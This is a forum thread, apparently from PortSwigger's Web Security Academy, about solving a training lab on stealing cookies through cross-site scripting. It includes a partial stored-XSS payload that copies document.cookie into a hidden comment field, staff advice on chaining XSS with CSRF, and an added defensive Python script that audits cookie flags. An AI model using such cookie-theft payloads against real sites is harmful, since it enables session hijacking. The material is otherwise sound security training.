How am I supposed to steal cookies from this lab
"Lab: Exploiting cross-site scripting to steal cookies" without having Burp Professional and without using the Burp Collaborator client?
I've tried redirecting users to my site and making everyone that visits the blog post a comment,
but neither of these two seems to work.
<input required type="hidden" name="postId" value="4">
<input type="hidden" id="coke" value="" name="comment">
<input required type="hidden" value="majname" name="name">
<input required type="hidden" value="email@example.com" name="email">
// getElementsByName() returns a NodeList, not a single element, so reading
// .value on it gives undefined; the first matching element must be indexed
var a_csrf = document.getElementsByName('csrf')[0].value;
// copy the current document's cookies into the hidden comment field
document.getElementById('coke').value = document.cookie;
var inp = document.createElement('input');
This is my payload for commenting.
It works on myself, but no bot seems to visit the blog, though.
Instead of using Burp Collaborator, you could adapt the attack to make the victim post their cookie within a blog comment by exploiting the XSS to perform CSRF, although this would mean that the cookie value is exposed publicly, and also discloses evidence that the attack was performed.
Hi, the previous comment is valid and not written by a bot. If you were able to perform that action you would force the emulated admin user to submit their cookie as a comment, which you could then retrieve from the blog post and submit in your request to solve the lab.
I have just checked the lab and it is working as intended, as I have been able to solve it. There is a lab which allows you to practice exploiting XSS to perform CSRF at the following link, which you could use to help you: https://portswigger.net/web-security/cross-site-scripting/exploiting/lab-perform-csrf
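As an added defender-side example (not part of this thread, the lab, or PortSwigger's code): the exfiltration described above only works because the session cookie is readable from document.cookie, which a cookie set with HttpOnly is not. The script below audits Set-Cookie headers for the flags that limit that read, plaintext transport, and cross-site sending; the headers are constructed samples.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

# Constructed sample Set-Cookie headers (not captured from the lab).
SAMPLE_SET_COOKIE_HEADERS = [
    "session=CONSTRUCTED_TOKEN_1; Path=/",
    "admin_session=CONSTRUCTED_TOKEN_2; Path=/; HttpOnly; Secure; SameSite=Lax",
    "prefs=dark; Path=/; SameSite=None; Secure",
]


@dataclass
class CookieReport:
    name: str
    script_readable: bool          # True means document.cookie exposes it
    missing: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> Tuple[str, Dict[str, str]]:
    """Split a Set-Cookie header into (cookie name, lower-cased attributes)."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, _value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), attrs


def audit_set_cookie(header: str) -> CookieReport:
    """Report which flags are absent that would blunt a document.cookie read
    by injected script, plaintext interception, or cross-site requests."""
    name, attrs = parse_set_cookie(header)
    report = CookieReport(name=name, script_readable="httponly" not in attrs)
    if report.script_readable:
        report.missing.append("HttpOnly")
    if "secure" not in attrs:
        report.missing.append("Secure")
    # SameSite=None (or absent) still lets the cookie ride on cross-site requests
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        report.missing.append("SameSite=Lax|Strict")
    return report


def audit_all(headers: List[str]) -> Dict[str, List[str]]:
    """Map each cookie name to the list of flags it is missing."""
    return {r.name: r.missing for r in map(audit_set_cookie, headers)}


if __name__ == "__main__":
    for name, missing in audit_all(SAMPLE_SET_COOKIE_HEADERS).items():
        print(f"{name}: {'ok' if not missing else 'missing ' + ', '.join(missing)}")
```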
I have even tried to inject very simple HTML tags, like these below, but the only HTTP connection I ever received was mine:
Is there any other test you suggest I could perform to validate that the bot is visiting my post? Because clearly, it looks like it is not.
Thanks for this report. I've passed on your message to our Web Academy team.
I also saw this video I googled, https://www.youtube.com/watch?v=glA5FwCdspk, about the solution, and I did everything exactly the same way, but, as mentioned, I have not received the request.
To summarise, it looks like the issue is that the HTTP request is not made to my collaborator, even though my collaborator is working correctly, as I validated via curl: it shows every HTTP request, but none from this lab. There is no possibility I made any typo, as I verified everything several times.
Thanks for following up. We're currently investigating this issue.
This issue should now be resolved.
Please let us know if you need any further assistance.